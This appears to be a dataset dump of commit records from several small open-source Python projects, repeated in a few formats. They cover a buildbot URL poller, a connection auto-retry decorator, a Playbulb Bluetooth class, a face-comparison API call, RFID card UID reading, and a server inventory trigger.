Specificly for Chromebot, it just need a simple way to trigger tests when 'http://commondatastorage.googleapis.com/chromium-browser-snapshots/Linux/LAST_CHANGE' changes.
Review URL: https://chromiumcodereview.appspot.com/12079048
git-svn-id: 239fca9b83025a0b6f823aeeca02ba5be3d9fd76@180488 0039d316-1c4b-4281-b951-d872f2087c98<commit_after># Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""This PollingChangeSource polls a URL for the change number.
Each change is submited to change master which triggers build steps.
Example:
To poll a change in Chromium build snapshots, use -
from buildbot.changes import url_poller
changeurl = 'http://commondatastorage.googleapis.com/'
'chromium-browser-snapshots/Linux/LAST_CHANGE'
poller = urlpoller.URLPoller(changeurl=changeurl, pollInterval=10800)
c['change_source'] = [poller]
"""
from twisted.python import log
from twisted.web.client import getPage
from buildbot.changes import base
class URLPoller(base.PollingChangeSource):
"""Poll a URL for change number and submit to change master."""
compare_attrs = ['changeurl', 'pollInterval']
def __init__(self, changeurl, pollInterval=3600, category=None):
"""Initialize URLPoller.
Args:
changeurl: The URL to change number.
pollInterval: The time (in seconds) between queries for
changes (default is 1 hour)
"""
self.changeurl = changeurl
self.pollInterval = pollInterval
self.category = category
self.last_change = None
base.PollingChangeSource.__init__(self, changeurl, pollInterval, category)
def describe(self):
return 'URLPoller watching %s' % self.changeurl
def poll(self):
log.msg('URLPoller polling %s' % self.changeurl)
d = getPage(self.changeurl, timeout=self.pollInterval)
d.addCallback(self._process_changes)
d.addErrback(self._finished_failure)
return d
def _finished_failure(self, res):
log.msg('URLPoller poll failed: %s. URL: %s' % (res, self.changeurl))
def _process_changes(self, change):
log.msg('URLPoller finished polling %s' % self.changeurl)
# Skip calling addChange() if this is the first successful poll.
if self.last_change != change:
self.master.addChange(who='committer',
files=[],
comments='comment',
category=self.category)
self.last_change = change
|
|
b6eb492b9023c568ec493b2a1923ae41f79bb3c8
|
mpdlcd/utils.py
|
mpdlcd/utils.py
|
# -*- coding: utf-8 -*-
# Copyright (c) 2011-2012 Raphaël Barrois
import functools
import logging
import time
class AutoRetryCandidate(object):
"""Base class for objects wishing to use the @auto_retry decorator.
Attributes:
_retry_logger (logging.Logger): where to log connection failures
retry_attempts (int): Maximum number of connection retries
retry_wait (int): The initial time to wait between retries
retry_backoff (int): Amount by which wait time should be multiplied
after each failure
"""
def __init__(self, retry_backoff, retry_wait, retry_attempts, logger=None,
*args, **kwargs):
if retry_backoff <= 1:
raise ValueError('retry_backoff should be greater than 1.')
self.retry_backoff = retry_backoff
if retry_wait <= 0:
raise ValueError('retry_wait should be positive.')
self.retry_wait = retry_wait
if retry_attempts < 0:
raise ValueError('retry_attempts should be positive or zero')
self.retry_attempts = retry_attempts
if not logger:
logger=logging.getLogger(self.__class__.__module__)
self._retry_logger = logger
super(AutoRetryCandidate, self).__init__(*args, **kwargs)
def auto_retry(fun):
"""Decorator for retrying method calls, based on instance parameters."""
@functools.wraps(fun)
def decorated(instance, *args, **kwargs):
"""Wrapper around a decorated function."""
remaining_tries = instance.retry_attempts
current_wait = instance.retry_wait
retry_backoff = instance.retry_backoff
last_error = None
while remaining_tries >= 0:
try:
return fun(*args, **kwargs)
except socket.error as e:
last_error = e
instance._retry_logger.warning('Connection failed: %s', e)
remaining_tries -= 1
if remaining_tries == 0:
# Last attempt
break
# Wait a bit
time.sleep(current_wait)
current_wait *= retry_backoff
# All attempts failed, let's raise the last error.
raise last_error
return decorated
|
Add a utility for auto-retrying connections.
|
Add a utility for auto-retrying connections.
Signed-off-by: Raphaël Barrois <8eb3b37a023209373fcd61a2fdc08256a14fb19c@polytechnique.org>
|
Python
|
mit
|
rbarrois/mpdlcd,rbarrois/mpdlcd
|
Add a utility for auto-retrying connections.
Signed-off-by: Raphaël Barrois <8eb3b37a023209373fcd61a2fdc08256a14fb19c@polytechnique.org>
|
# -*- coding: utf-8 -*-
# Copyright (c) 2011-2012 Raphaël Barrois
import functools
import logging
import time
class AutoRetryCandidate(object):
"""Base class for objects wishing to use the @auto_retry decorator.
Attributes:
_retry_logger (logging.Logger): where to log connection failures
retry_attempts (int): Maximum number of connection retries
retry_wait (int): The initial time to wait between retries
retry_backoff (int): Amount by which wait time should be multiplied
after each failure
"""
def __init__(self, retry_backoff, retry_wait, retry_attempts, logger=None,
*args, **kwargs):
if retry_backoff <= 1:
raise ValueError('retry_backoff should be greater than 1.')
self.retry_backoff = retry_backoff
if retry_wait <= 0:
raise ValueError('retry_wait should be positive.')
self.retry_wait = retry_wait
if retry_attempts < 0:
raise ValueError('retry_attempts should be positive or zero')
self.retry_attempts = retry_attempts
if not logger:
logger=logging.getLogger(self.__class__.__module__)
self._retry_logger = logger
super(AutoRetryCandidate, self).__init__(*args, **kwargs)
def auto_retry(fun):
"""Decorator for retrying method calls, based on instance parameters."""
@functools.wraps(fun)
def decorated(instance, *args, **kwargs):
"""Wrapper around a decorated function."""
remaining_tries = instance.retry_attempts
current_wait = instance.retry_wait
retry_backoff = instance.retry_backoff
last_error = None
while remaining_tries >= 0:
try:
return fun(*args, **kwargs)
except socket.error as e:
last_error = e
instance._retry_logger.warning('Connection failed: %s', e)
remaining_tries -= 1
if remaining_tries == 0:
# Last attempt
break
# Wait a bit
time.sleep(current_wait)
current_wait *= retry_backoff
# All attempts failed, let's raise the last error.
raise last_error
return decorated
|
<commit_before><commit_msg>Add a utility for auto-retrying connections.
Signed-off-by: Raphaël Barrois <8eb3b37a023209373fcd61a2fdc08256a14fb19c@polytechnique.org><commit_after>
|
# -*- coding: utf-8 -*-
# Copyright (c) 2011-2012 Raphaël Barrois
import functools
import logging
import time
class AutoRetryCandidate(object):
"""Base class for objects wishing to use the @auto_retry decorator.
Attributes:
_retry_logger (logging.Logger): where to log connection failures
retry_attempts (int): Maximum number of connection retries
retry_wait (int): The initial time to wait between retries
retry_backoff (int): Amount by which wait time should be multiplied
after each failure
"""
def __init__(self, retry_backoff, retry_wait, retry_attempts, logger=None,
*args, **kwargs):
if retry_backoff <= 1:
raise ValueError('retry_backoff should be greater than 1.')
self.retry_backoff = retry_backoff
if retry_wait <= 0:
raise ValueError('retry_wait should be positive.')
self.retry_wait = retry_wait
if retry_attempts < 0:
raise ValueError('retry_attempts should be positive or zero')
self.retry_attempts = retry_attempts
if not logger:
logger=logging.getLogger(self.__class__.__module__)
self._retry_logger = logger
super(AutoRetryCandidate, self).__init__(*args, **kwargs)
def auto_retry(fun):
"""Decorator for retrying method calls, based on instance parameters."""
@functools.wraps(fun)
def decorated(instance, *args, **kwargs):
"""Wrapper around a decorated function."""
remaining_tries = instance.retry_attempts
current_wait = instance.retry_wait
retry_backoff = instance.retry_backoff
last_error = None
while remaining_tries >= 0:
try:
return fun(*args, **kwargs)
except socket.error as e:
last_error = e
instance._retry_logger.warning('Connection failed: %s', e)
remaining_tries -= 1
if remaining_tries == 0:
# Last attempt
break
# Wait a bit
time.sleep(current_wait)
current_wait *= retry_backoff
# All attempts failed, let's raise the last error.
raise last_error
return decorated
|
Add a utility for auto-retrying connections.
Signed-off-by: Raphaël Barrois <8eb3b37a023209373fcd61a2fdc08256a14fb19c@polytechnique.org># -*- coding: utf-8 -*-
# Copyright (c) 2011-2012 Raphaël Barrois
import functools
import logging
import time
class AutoRetryCandidate(object):
"""Base class for objects wishing to use the @auto_retry decorator.
Attributes:
_retry_logger (logging.Logger): where to log connection failures
retry_attempts (int): Maximum number of connection retries
retry_wait (int): The initial time to wait between retries
retry_backoff (int): Amount by which wait time should be multiplied
after each failure
"""
def __init__(self, retry_backoff, retry_wait, retry_attempts, logger=None,
*args, **kwargs):
if retry_backoff <= 1:
raise ValueError('retry_backoff should be greater than 1.')
self.retry_backoff = retry_backoff
if retry_wait <= 0:
raise ValueError('retry_wait should be positive.')
self.retry_wait = retry_wait
if retry_attempts < 0:
raise ValueError('retry_attempts should be positive or zero')
self.retry_attempts = retry_attempts
if not logger:
logger=logging.getLogger(self.__class__.__module__)
self._retry_logger = logger
super(AutoRetryCandidate, self).__init__(*args, **kwargs)
def auto_retry(fun):
"""Decorator for retrying method calls, based on instance parameters."""
@functools.wraps(fun)
def decorated(instance, *args, **kwargs):
"""Wrapper around a decorated function."""
remaining_tries = instance.retry_attempts
current_wait = instance.retry_wait
retry_backoff = instance.retry_backoff
last_error = None
while remaining_tries >= 0:
try:
return fun(*args, **kwargs)
except socket.error as e:
last_error = e
instance._retry_logger.warning('Connection failed: %s', e)
remaining_tries -= 1
if remaining_tries == 0:
# Last attempt
break
# Wait a bit
time.sleep(current_wait)
current_wait *= retry_backoff
# All attempts failed, let's raise the last error.
raise last_error
return decorated
|
<commit_before><commit_msg>Add a utility for auto-retrying connections.
Signed-off-by: Raphaël Barrois <8eb3b37a023209373fcd61a2fdc08256a14fb19c@polytechnique.org><commit_after># -*- coding: utf-8 -*-
# Copyright (c) 2011-2012 Raphaël Barrois
import functools
import logging
import time
class AutoRetryCandidate(object):
"""Base class for objects wishing to use the @auto_retry decorator.
Attributes:
_retry_logger (logging.Logger): where to log connection failures
retry_attempts (int): Maximum number of connection retries
retry_wait (int): The initial time to wait between retries
retry_backoff (int): Amount by which wait time should be multiplied
after each failure
"""
def __init__(self, retry_backoff, retry_wait, retry_attempts, logger=None,
*args, **kwargs):
if retry_backoff <= 1:
raise ValueError('retry_backoff should be greater than 1.')
self.retry_backoff = retry_backoff
if retry_wait <= 0:
raise ValueError('retry_wait should be positive.')
self.retry_wait = retry_wait
if retry_attempts < 0:
raise ValueError('retry_attempts should be positive or zero')
self.retry_attempts = retry_attempts
if not logger:
logger=logging.getLogger(self.__class__.__module__)
self._retry_logger = logger
super(AutoRetryCandidate, self).__init__(*args, **kwargs)
def auto_retry(fun):
"""Decorator for retrying method calls, based on instance parameters."""
@functools.wraps(fun)
def decorated(instance, *args, **kwargs):
"""Wrapper around a decorated function."""
remaining_tries = instance.retry_attempts
current_wait = instance.retry_wait
retry_backoff = instance.retry_backoff
last_error = None
while remaining_tries >= 0:
try:
return fun(*args, **kwargs)
except socket.error as e:
last_error = e
instance._retry_logger.warning('Connection failed: %s', e)
remaining_tries -= 1
if remaining_tries == 0:
# Last attempt
break
# Wait a bit
time.sleep(current_wait)
current_wait *= retry_backoff
# All attempts failed, let's raise the last error.
raise last_error
return decorated
|
|
30c1ca3d17b677237eb822dba3d5d66bd8338b3c
|
pyplaybulb/playbulb.py
|
pyplaybulb/playbulb.py
|
from gatt import gattpy
class Playbulb:
hexa_name= '0x0003'
hexa_application_version = '0x0023'
hexa_microprocessor_version= '0x0021'
hexa_manufacturer= '0x0025'
hexa_brightness= '0x0010'
hexa_set_colour= ''
hexa_get_colour= ''
def __init__(self, mac_id):
self.mac_address = mac_id
self.connection = gattpy(mac_id)
def set_colour(self, colour):
raise NotImplementedError
def get_colour(self):
raise NotImplementedError
def get_name(self):
string_hexa = self.connection.char_read(self.hexa_name)
return bytes.fromhex(string_hexa).decode('utf-8')
def get_application_version(self):
string_hexa = self.connection.char_read(self.hexa_application_version)
return bytes.fromhex(string_hexa).decode('utf-8')
def get_microprocessor_version(self):
string_hexa = self.connection.char_read(self.hexa_microprocessor_version)
return bytes.fromhex(string_hexa).decode('utf-8')
def get_manufacturer(self):
string_hexa = self.connection.char_read(self.hexa_manufacturer)
return bytes.fromhex(string_hexa).decode('utf-8')
if __name__ == '__main__':
c = Playbulb('94:FC:4B:0A:AC:E6')
print(c.get_name())
print(c.get_application_version())
|
Create parent class for bulbs
|
Create parent class for bulbs
|
Python
|
mit
|
litobro/PyPlaybulb
|
Create parent class for bulbs
|
from gatt import gattpy
class Playbulb:
hexa_name= '0x0003'
hexa_application_version = '0x0023'
hexa_microprocessor_version= '0x0021'
hexa_manufacturer= '0x0025'
hexa_brightness= '0x0010'
hexa_set_colour= ''
hexa_get_colour= ''
def __init__(self, mac_id):
self.mac_address = mac_id
self.connection = gattpy(mac_id)
def set_colour(self, colour):
raise NotImplementedError
def get_colour(self):
raise NotImplementedError
def get_name(self):
string_hexa = self.connection.char_read(self.hexa_name)
return bytes.fromhex(string_hexa).decode('utf-8')
def get_application_version(self):
string_hexa = self.connection.char_read(self.hexa_application_version)
return bytes.fromhex(string_hexa).decode('utf-8')
def get_microprocessor_version(self):
string_hexa = self.connection.char_read(self.hexa_microprocessor_version)
return bytes.fromhex(string_hexa).decode('utf-8')
def get_manufacturer(self):
string_hexa = self.connection.char_read(self.hexa_manufacturer)
return bytes.fromhex(string_hexa).decode('utf-8')
if __name__ == '__main__':
c = Playbulb('94:FC:4B:0A:AC:E6')
print(c.get_name())
print(c.get_application_version())
|
<commit_before><commit_msg>Create parent class for bulbs<commit_after>
|
from gatt import gattpy
class Playbulb:
hexa_name= '0x0003'
hexa_application_version = '0x0023'
hexa_microprocessor_version= '0x0021'
hexa_manufacturer= '0x0025'
hexa_brightness= '0x0010'
hexa_set_colour= ''
hexa_get_colour= ''
def __init__(self, mac_id):
self.mac_address = mac_id
self.connection = gattpy(mac_id)
def set_colour(self, colour):
raise NotImplementedError
def get_colour(self):
raise NotImplementedError
def get_name(self):
string_hexa = self.connection.char_read(self.hexa_name)
return bytes.fromhex(string_hexa).decode('utf-8')
def get_application_version(self):
string_hexa = self.connection.char_read(self.hexa_application_version)
return bytes.fromhex(string_hexa).decode('utf-8')
def get_microprocessor_version(self):
string_hexa = self.connection.char_read(self.hexa_microprocessor_version)
return bytes.fromhex(string_hexa).decode('utf-8')
def get_manufacturer(self):
string_hexa = self.connection.char_read(self.hexa_manufacturer)
return bytes.fromhex(string_hexa).decode('utf-8')
if __name__ == '__main__':
c = Playbulb('94:FC:4B:0A:AC:E6')
print(c.get_name())
print(c.get_application_version())
|
Create parent class for bulbsfrom gatt import gattpy
class Playbulb:
hexa_name= '0x0003'
hexa_application_version = '0x0023'
hexa_microprocessor_version= '0x0021'
hexa_manufacturer= '0x0025'
hexa_brightness= '0x0010'
hexa_set_colour= ''
hexa_get_colour= ''
def __init__(self, mac_id):
self.mac_address = mac_id
self.connection = gattpy(mac_id)
def set_colour(self, colour):
raise NotImplementedError
def get_colour(self):
raise NotImplementedError
def get_name(self):
string_hexa = self.connection.char_read(self.hexa_name)
return bytes.fromhex(string_hexa).decode('utf-8')
def get_application_version(self):
string_hexa = self.connection.char_read(self.hexa_application_version)
return bytes.fromhex(string_hexa).decode('utf-8')
def get_microprocessor_version(self):
string_hexa = self.connection.char_read(self.hexa_microprocessor_version)
return bytes.fromhex(string_hexa).decode('utf-8')
def get_manufacturer(self):
string_hexa = self.connection.char_read(self.hexa_manufacturer)
return bytes.fromhex(string_hexa).decode('utf-8')
if __name__ == '__main__':
c = Playbulb('94:FC:4B:0A:AC:E6')
print(c.get_name())
print(c.get_application_version())
|
<commit_before><commit_msg>Create parent class for bulbs<commit_after>from gatt import gattpy
class Playbulb:
hexa_name= '0x0003'
hexa_application_version = '0x0023'
hexa_microprocessor_version= '0x0021'
hexa_manufacturer= '0x0025'
hexa_brightness= '0x0010'
hexa_set_colour= ''
hexa_get_colour= ''
def __init__(self, mac_id):
self.mac_address = mac_id
self.connection = gattpy(mac_id)
def set_colour(self, colour):
raise NotImplementedError
def get_colour(self):
raise NotImplementedError
def get_name(self):
string_hexa = self.connection.char_read(self.hexa_name)
return bytes.fromhex(string_hexa).decode('utf-8')
def get_application_version(self):
string_hexa = self.connection.char_read(self.hexa_application_version)
return bytes.fromhex(string_hexa).decode('utf-8')
def get_microprocessor_version(self):
string_hexa = self.connection.char_read(self.hexa_microprocessor_version)
return bytes.fromhex(string_hexa).decode('utf-8')
def get_manufacturer(self):
string_hexa = self.connection.char_read(self.hexa_manufacturer)
return bytes.fromhex(string_hexa).decode('utf-8')
if __name__ == '__main__':
c = Playbulb('94:FC:4B:0A:AC:E6')
print(c.get_name())
print(c.get_application_version())
|
|
240e7272a3e25abea3d7bf1e835f71e512967bd2
|
python/face_compare.py
|
python/face_compare.py
|
import requests
import json
# Check whether the given faces belong to the same person or not.
# https://pixlab.io/#/cmd?id=facecompare for additional information.
src = 'https://static-secure.guim.co.uk/sys-images/Guardian/Pix/pictures/2012/7/9/1341860104423/obama_face.jpg'
target = 'https://static01.nyt.com/images/2011/07/31/sunday-review/FACES/FACES-jumbo.jpg'
# Unrelated face
#target = 'https://s-media-cache-ak0.pinimg.com/736x/60/aa/e4/60aae45858ab6ce9dc5b33cc2e69baf7.jpg'
req = requests.get('https://api.pixlab.io/facecompare',params={
'src': src,
'target': target,
'key':'My_Pix_Key',
})
reply = req.json()
if reply['status'] != 200:
print (reply['error'])
else:
print ("Same Face: "+ str(reply['same_face']))
print ("Confidence: "+ str(reply['confidence']))
|
Check whether the given faces belong to the same person or not
|
Check whether the given faces belong to the same person or not
|
Python
|
bsd-2-clause
|
symisc/pixlab,symisc/pixlab,symisc/pixlab
|
Check whether the given faces belong to the same person or not
|
import requests
import json
# Check whether the given faces belong to the same person or not.
# https://pixlab.io/#/cmd?id=facecompare for additional information.
src = 'https://static-secure.guim.co.uk/sys-images/Guardian/Pix/pictures/2012/7/9/1341860104423/obama_face.jpg'
target = 'https://static01.nyt.com/images/2011/07/31/sunday-review/FACES/FACES-jumbo.jpg'
# Unrelated face
#target = 'https://s-media-cache-ak0.pinimg.com/736x/60/aa/e4/60aae45858ab6ce9dc5b33cc2e69baf7.jpg'
req = requests.get('https://api.pixlab.io/facecompare',params={
'src': src,
'target': target,
'key':'My_Pix_Key',
})
reply = req.json()
if reply['status'] != 200:
print (reply['error'])
else:
print ("Same Face: "+ str(reply['same_face']))
print ("Confidence: "+ str(reply['confidence']))
|
<commit_before><commit_msg>Check whether the given faces belong to the same person or not<commit_after>
|
import requests
import json
# Check whether the given faces belong to the same person or not.
# https://pixlab.io/#/cmd?id=facecompare for additional information.
src = 'https://static-secure.guim.co.uk/sys-images/Guardian/Pix/pictures/2012/7/9/1341860104423/obama_face.jpg'
target = 'https://static01.nyt.com/images/2011/07/31/sunday-review/FACES/FACES-jumbo.jpg'
# Unrelated face
#target = 'https://s-media-cache-ak0.pinimg.com/736x/60/aa/e4/60aae45858ab6ce9dc5b33cc2e69baf7.jpg'
req = requests.get('https://api.pixlab.io/facecompare',params={
'src': src,
'target': target,
'key':'My_Pix_Key',
})
reply = req.json()
if reply['status'] != 200:
print (reply['error'])
else:
print ("Same Face: "+ str(reply['same_face']))
print ("Confidence: "+ str(reply['confidence']))
|
Check whether the given faces belong to the same person or notimport requests
import json
# Check whether the given faces belong to the same person or not.
# https://pixlab.io/#/cmd?id=facecompare for additional information.
src = 'https://static-secure.guim.co.uk/sys-images/Guardian/Pix/pictures/2012/7/9/1341860104423/obama_face.jpg'
target = 'https://static01.nyt.com/images/2011/07/31/sunday-review/FACES/FACES-jumbo.jpg'
# Unrelated face
#target = 'https://s-media-cache-ak0.pinimg.com/736x/60/aa/e4/60aae45858ab6ce9dc5b33cc2e69baf7.jpg'
req = requests.get('https://api.pixlab.io/facecompare',params={
'src': src,
'target': target,
'key':'My_Pix_Key',
})
reply = req.json()
if reply['status'] != 200:
print (reply['error'])
else:
print ("Same Face: "+ str(reply['same_face']))
print ("Confidence: "+ str(reply['confidence']))
|
<commit_before><commit_msg>Check whether the given faces belong to the same person or not<commit_after>import requests
import json
# Check whether the given faces belong to the same person or not.
# https://pixlab.io/#/cmd?id=facecompare for additional information.
src = 'https://static-secure.guim.co.uk/sys-images/Guardian/Pix/pictures/2012/7/9/1341860104423/obama_face.jpg'
target = 'https://static01.nyt.com/images/2011/07/31/sunday-review/FACES/FACES-jumbo.jpg'
# Unrelated face
#target = 'https://s-media-cache-ak0.pinimg.com/736x/60/aa/e4/60aae45858ab6ce9dc5b33cc2e69baf7.jpg'
req = requests.get('https://api.pixlab.io/facecompare',params={
'src': src,
'target': target,
'key':'My_Pix_Key',
})
reply = req.json()
if reply['status'] != 200:
print (reply['error'])
else:
print ("Same Face: "+ str(reply['same_face']))
print ("Confidence: "+ str(reply['confidence']))
|
|
96cba2528f4ef18635c04521415ab033878f07da
|
mfrc522/iso14443com.py
|
mfrc522/iso14443com.py
|
from .mfrc522 import *
SEL_CASCADE_1 = 0x93
SEL_CASCADE_2 = 0x95
SEL_CASCADE_3 = 0x97
def __perform_cascade(module, cascade_level):
if cascade_level != SEL_CASCADE_1 and \
cascade_level != SEL_CASCADE_2 and \
cascade_level != SEL_CASCADE_3:
return None
# print('Performing cascade', cascade_level)
module.write_register(MFRC522.Registers.BitFramingReg, 0x00)
# transmit ANTICOLLISION command
uid_cln = module.transcieve(bytes((cascade_level, 0x20)))
# TODO check for collisions, screw it for now
# transmit SELECT command
data = bytes((cascade_level, 0x70)) + bytes(uid_cln)
data += module.calculate_crc_a(data)
response = module.transcieve(data)
if response[0] & 0x04:
# print('UID incomplete, cascading...')
return uid_cln[1:4] + __perform_cascade(module, cascade_level + 2)
elif response[0] & 0x24 == 0x20:
# print('UID complete, PICC compliant with ISO/IEC 14443-4')
return uid_cln[:4]
elif response[0] & 0x24 == 0:
# print('UID complete, PICC not compliant with ISO/IEC 14443-4')
return uid_cln[:4]
def get_ids(module):
module.write_register(MFRC522.Registers.BitFramingReg, 0x07)
try:
# module.transcieve([0x26]) # REQA
return __perform_cascade(module, SEL_CASCADE_1)
except NoTagError:
return None
def are_cards_in_field(module):
module.write_register(MFRC522.Registers.BitFramingReg, 0x07)
try:
module.transcieve([0x26]) # REQA
return True
except NoTagError:
return False
|
Implement detecting iso14443a compliant cards
|
[WIP] Implement detecting iso14443a compliant cards
|
Python
|
mit
|
fmfi-svt-deadlock/libmfrc522.py
|
[WIP] Implement detecting iso14443a compliant cards
|
from .mfrc522 import *
SEL_CASCADE_1 = 0x93
SEL_CASCADE_2 = 0x95
SEL_CASCADE_3 = 0x97
def __perform_cascade(module, cascade_level):
if cascade_level != SEL_CASCADE_1 and \
cascade_level != SEL_CASCADE_2 and \
cascade_level != SEL_CASCADE_3:
return None
# print('Performing cascade', cascade_level)
module.write_register(MFRC522.Registers.BitFramingReg, 0x00)
# transmit ANTICOLLISION command
uid_cln = module.transcieve(bytes((cascade_level, 0x20)))
# TODO check for collisions, screw it for now
# transmit SELECT command
data = bytes((cascade_level, 0x70)) + bytes(uid_cln)
data += module.calculate_crc_a(data)
response = module.transcieve(data)
if response[0] & 0x04:
# print('UID incomplete, cascading...')
return uid_cln[1:4] + __perform_cascade(module, cascade_level + 2)
elif response[0] & 0x24 == 0x20:
# print('UID complete, PICC compliant with ISO/IEC 14443-4')
return uid_cln[:4]
elif response[0] & 0x24 == 0:
# print('UID complete, PICC not compliant with ISO/IEC 14443-4')
return uid_cln[:4]
def get_ids(module):
module.write_register(MFRC522.Registers.BitFramingReg, 0x07)
try:
# module.transcieve([0x26]) # REQA
return __perform_cascade(module, SEL_CASCADE_1)
except NoTagError:
return None
def are_cards_in_field(module):
module.write_register(MFRC522.Registers.BitFramingReg, 0x07)
try:
module.transcieve([0x26]) # REQA
return True
except NoTagError:
return False
|
<commit_before><commit_msg>[WIP] Implement detecting iso14443a compliant cards<commit_after>
|
from .mfrc522 import *
SEL_CASCADE_1 = 0x93
SEL_CASCADE_2 = 0x95
SEL_CASCADE_3 = 0x97
def __perform_cascade(module, cascade_level):
if cascade_level != SEL_CASCADE_1 and \
cascade_level != SEL_CASCADE_2 and \
cascade_level != SEL_CASCADE_3:
return None
# print('Performing cascade', cascade_level)
module.write_register(MFRC522.Registers.BitFramingReg, 0x00)
# transmit ANTICOLLISION command
uid_cln = module.transcieve(bytes((cascade_level, 0x20)))
# TODO check for collisions, screw it for now
# transmit SELECT command
data = bytes((cascade_level, 0x70)) + bytes(uid_cln)
data += module.calculate_crc_a(data)
response = module.transcieve(data)
if response[0] & 0x04:
# print('UID incomplete, cascading...')
return uid_cln[1:4] + __perform_cascade(module, cascade_level + 2)
elif response[0] & 0x24 == 0x20:
# print('UID complete, PICC compliant with ISO/IEC 14443-4')
return uid_cln[:4]
elif response[0] & 0x24 == 0:
# print('UID complete, PICC not compliant with ISO/IEC 14443-4')
return uid_cln[:4]
def get_ids(module):
module.write_register(MFRC522.Registers.BitFramingReg, 0x07)
try:
# module.transcieve([0x26]) # REQA
return __perform_cascade(module, SEL_CASCADE_1)
except NoTagError:
return None
def are_cards_in_field(module):
module.write_register(MFRC522.Registers.BitFramingReg, 0x07)
try:
module.transcieve([0x26]) # REQA
return True
except NoTagError:
return False
|
[WIP] Implement detecting iso14443a compliant cardsfrom .mfrc522 import *
SEL_CASCADE_1 = 0x93
SEL_CASCADE_2 = 0x95
SEL_CASCADE_3 = 0x97
def __perform_cascade(module, cascade_level):
if cascade_level != SEL_CASCADE_1 and \
cascade_level != SEL_CASCADE_2 and \
cascade_level != SEL_CASCADE_3:
return None
# print('Performing cascade', cascade_level)
module.write_register(MFRC522.Registers.BitFramingReg, 0x00)
# transmit ANTICOLLISION command
uid_cln = module.transcieve(bytes((cascade_level, 0x20)))
# TODO check for collisions, screw it for now
# transmit SELECT command
data = bytes((cascade_level, 0x70)) + bytes(uid_cln)
data += module.calculate_crc_a(data)
response = module.transcieve(data)
if response[0] & 0x04:
# print('UID incomplete, cascading...')
return uid_cln[1:4] + __perform_cascade(module, cascade_level + 2)
elif response[0] & 0x24 == 0x20:
# print('UID complete, PICC compliant with ISO/IEC 14443-4')
return uid_cln[:4]
elif response[0] & 0x24 == 0:
# print('UID complete, PICC not compliant with ISO/IEC 14443-4')
return uid_cln[:4]
def get_ids(module):
module.write_register(MFRC522.Registers.BitFramingReg, 0x07)
try:
# module.transcieve([0x26]) # REQA
return __perform_cascade(module, SEL_CASCADE_1)
except NoTagError:
return None
def are_cards_in_field(module):
module.write_register(MFRC522.Registers.BitFramingReg, 0x07)
try:
module.transcieve([0x26]) # REQA
return True
except NoTagError:
return False
|
<commit_before><commit_msg>[WIP] Implement detecting iso14443a compliant cards<commit_after>from .mfrc522 import *
SEL_CASCADE_1 = 0x93
SEL_CASCADE_2 = 0x95
SEL_CASCADE_3 = 0x97
def __perform_cascade(module, cascade_level):
if cascade_level != SEL_CASCADE_1 and \
cascade_level != SEL_CASCADE_2 and \
cascade_level != SEL_CASCADE_3:
return None
# print('Performing cascade', cascade_level)
module.write_register(MFRC522.Registers.BitFramingReg, 0x00)
# transmit ANTICOLLISION command
uid_cln = module.transcieve(bytes((cascade_level, 0x20)))
# TODO check for collisions, screw it for now
# transmit SELECT command
data = bytes((cascade_level, 0x70)) + bytes(uid_cln)
data += module.calculate_crc_a(data)
response = module.transcieve(data)
if response[0] & 0x04:
# print('UID incomplete, cascading...')
return uid_cln[1:4] + __perform_cascade(module, cascade_level + 2)
elif response[0] & 0x24 == 0x20:
# print('UID complete, PICC compliant with ISO/IEC 14443-4')
return uid_cln[:4]
elif response[0] & 0x24 == 0:
# print('UID complete, PICC not compliant with ISO/IEC 14443-4')
return uid_cln[:4]
def get_ids(module):
module.write_register(MFRC522.Registers.BitFramingReg, 0x07)
try:
# module.transcieve([0x26]) # REQA
return __perform_cascade(module, SEL_CASCADE_1)
except NoTagError:
return None
def are_cards_in_field(module):
module.write_register(MFRC522.Registers.BitFramingReg, 0x07)
try:
module.transcieve([0x26]) # REQA
return True
except NoTagError:
return False
|
|
98d22ffabc797935c03bda1b22d21ce0b81efc19
|
misc/forceinventory.py
|
misc/forceinventory.py
|
import pyghmi.ipmi.command as cmd
import sys
import os
# alternatively, the following ipmi raw sequence:
# 0x3a 0xc4 0x3 0x0 0x21 0x1 0x9d 0x2f 0x76 0x32 0x2f 0x69 0x62 0x6d 0x63 0x2f 0x75 0x65 0x66 0x69 0x2f 0x66 0x6f 0x72 0x63 0x65 0x2d 0x69 0x6e 0x76 0x65 0x6e 0x74 0x6f 0x72 0x79 0x11 0x1
c = cmd.Command(sys.argv[1], os.environ['XCCUSER'], os.environ['XCCPASS'], verifycallback=lambda x: True)
c.oem_init()
c._oem.immhandler.set_property('/v2/ibmc/uefi/force-inventory', 1)
|
Add a utility to induce an inventory
|
Add a utility to induce an inventory
|
Python
|
apache-2.0
|
xcat2/confluent,xcat2/confluent,jjohnson42/confluent,xcat2/confluent,jjohnson42/confluent,jjohnson42/confluent,jjohnson42/confluent,jjohnson42/confluent,xcat2/confluent,xcat2/confluent
|
Add a utility to induce an inventory
|
import pyghmi.ipmi.command as cmd
import sys
import os
# alternatively, the following ipmi raw sequence:
# 0x3a 0xc4 0x3 0x0 0x21 0x1 0x9d 0x2f 0x76 0x32 0x2f 0x69 0x62 0x6d 0x63 0x2f 0x75 0x65 0x66 0x69 0x2f 0x66 0x6f 0x72 0x63 0x65 0x2d 0x69 0x6e 0x76 0x65 0x6e 0x74 0x6f 0x72 0x79 0x11 0x1
c = cmd.Command(sys.argv[1], os.environ['XCCUSER'], os.environ['XCCPASS'], verifycallback=lambda x: True)
c.oem_init()
c._oem.immhandler.set_property('/v2/ibmc/uefi/force-inventory', 1)
|
<commit_before><commit_msg>Add a utility to induce an inventory<commit_after>
|
import pyghmi.ipmi.command as cmd
import sys
import os
# alternatively, the following ipmi raw sequence:
# 0x3a 0xc4 0x3 0x0 0x21 0x1 0x9d 0x2f 0x76 0x32 0x2f 0x69 0x62 0x6d 0x63 0x2f 0x75 0x65 0x66 0x69 0x2f 0x66 0x6f 0x72 0x63 0x65 0x2d 0x69 0x6e 0x76 0x65 0x6e 0x74 0x6f 0x72 0x79 0x11 0x1
c = cmd.Command(sys.argv[1], os.environ['XCCUSER'], os.environ['XCCPASS'], verifycallback=lambda x: True)
c.oem_init()
c._oem.immhandler.set_property('/v2/ibmc/uefi/force-inventory', 1)
|
Add a utility to induce an inventoryimport pyghmi.ipmi.command as cmd
import sys
import os
# alternatively, the following ipmi raw sequence:
